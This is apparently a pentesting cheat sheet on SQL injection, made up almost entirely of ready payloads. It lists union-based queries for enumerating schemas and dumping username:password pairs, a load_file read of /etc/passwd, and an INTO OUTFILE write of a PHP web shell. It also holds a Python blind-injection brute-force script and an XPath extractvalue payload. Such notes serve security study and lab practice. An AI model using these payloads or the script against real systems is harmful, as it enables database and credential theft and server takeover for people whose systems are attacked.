SQL INJECTION

1

Find the number of columns

' union select 1,2-- -
' union select NULL,NULL-- -
' order by 5-- -
2

List the databses

' union select schema_name,NULL from information_schema.schemata-- -
' union select group_concat(schema_name,NULL) from information_schema.schemata-- -
' union select schema_name,NULL from information_schema.schemata limit 0,1-- -

// SQLite
' or 1=1 UNION SELECT tbl_name ,NULL,NULL,NULL,NULL FROM sqlite_master--
' or 1=1 UNION SELECT sql ,NULL,NULL,NULL,NULL FROM sqlite_master--
' or 1=1 UNION SELECT flag,NULL,value,NULL,NULL FROM secret_flag--
3

List the tables

' union select table_name,NULL from information_schema.tables where table_schema='<name>'--
' union select table_name,NULL from information_schema.tables where table_schema='<name>' limit 0,1--
4

List the columns

' union select column_name,NULL from information_schema.columns where table_name='<name>--
' union select column_name,NULL from information_schema.columns where table_name='<name> limit 0,1--
5

List the content

' union select concat(username,":",password) from users-- -
' union select concat(username,0x3a,password) from users-- -
' union select concat(username||':'||password) from users--
6

Read Files

' or 1=1 UNION SELECT load_file("/etc/passwd"),NULL,NULL,NULL,NULL--

if the file does not work try in hex:

echo "/etc/passwd" | tr -d '\n' \ xxd -ps
' or 1=1 UNION SELECT load_file("hex_file"),NULL,NULL,NULL,NULL--
7

Upload Files

' or 1=1 UNION SELECT "test",NULL,NULL,NULL,NULL into outfile "/var/www/html/test.txt"--
' or 1=1 UNION SELECT "<?php system($_GET['cmd']);?>",NULL,NULL,NULL,NULL into outfile "/var/www/html/webshell.php"--

Bind SQL

Let's assume that Bind SQL Injection was found. Let's do a script using substring for extracting the database name:

#!/usr/bin/env python3

import requests
import signal
import time
import pdb
import sys
import string

from pwn import *
from termcolor import colored

def def_handler(sig, frame):
	print(colored(f"\n\n[!] Exit...\n", 'red'))
	sys.exit(1)

# Ctrl + C
signal.signal(signal.SIGINT, def_handler)

cookies = {
	'<cookie1>': '<value1>', 
	'<cookie2>': '<value2>'
}

characters = string.ascii_lowercase + '-_,'
main_url = "<url>"

def makeSQL():

	p1 = log.progress("Brute Force")
	p1.status("Starting...")
	
	time.sleep(2)
	
	database = ""
	
	p2 = log.progress("Database")
	
	for pos in range(1,50):
		for character in characters:
			post_data = {
				'<parameter1>': '<value1>',
				"<parameter2>": f"'or substring(database(),{pos},1)='{character}'-- -"
			}
			
			p1.status(f"Trying with {character}")
			
			r = requests.post(main_url, data=post_data, cookies=cookies)
			
			if "<test displayed when sql is true>" in r.text:
				database += character
				p2.status(database)
				break
		


if __name__ == '__main__':

	makeSQL()

Then for extracting the table name we only modify the sql injection payload:

'or substring((select group_concat(table_name) from information_schema.tables where table_schema='<database_name>'),{pos},1)='{character}'-- -

Let's retrieve the columns of a table:

'or substring((select group_concat(column_name) from information_schema.columns where table_name='<table>'),{pos},1)='{character}'-- -

Retrieve user and password:

'or substring((select group_concat((BINARY username),':',(BINARY password)) from admin_users),{pos},1)='{character}'-- -

XPATH Injection

XPATH Error Based Injection Extractvalue

We have to use XPATH when we try to inject and we get an error "Unknown column". So this is the condition when you can depend on XPATH injection.

This is the double quote over there..that means this time we are injecting into a string type query where the query is like.

select path from pages where view="<our_input_here>" limit 1,1;

Explotation

'and extractvalue(0x0a,concat(0x0a,(OUR_QUERY)))
PreviousCMSNextXXE

Last updated